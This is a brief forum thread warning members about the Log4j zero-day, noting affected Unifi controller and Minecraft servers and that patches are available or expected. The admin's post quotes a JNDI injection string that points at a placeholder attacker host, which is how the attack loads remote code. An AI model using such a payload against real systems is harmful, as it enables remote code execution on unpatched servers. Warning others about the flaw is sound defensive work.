|
| Joined: Aug 2004 Posts: 1,379 Likes: 9 Admin | OP Admin Joined: Aug 2004 Posts: 1,379 Likes: 9 | There is a nasty zero day exploit that was just made public around a certain Java logging application called "log4j" - see some details here: https://sysdig.com/blog/cve-critical-vulnerability-log4j/One thing I know for sure that's affected is the Unifi controller software (there is a patch available). Apparently it really sucks for Minecraft servers too. A bad actor can supposedly run any code they want simply by sending ${jndi:ldap://BADHOST.COM:PORT/RemoteCommand} Ug.  | | | | Joined: Jun 2006 Posts: 2,921 Moderator-Samsung | Moderator-Samsung Joined: Jun 2006 Posts: 2,921 | Microsoft has released a patch for Minecraft servers (1.18.1)
I expect there'll be a patch soon for unifi as well. | | | Forums84 Topics93,521 Posts635,349 Members49,569 | Most Online5,661 May 23rd, 2018 | |
0 members (),
6
guests, and
14
robots. | Key: Admin,
Global Mod,
Mod | | | |
|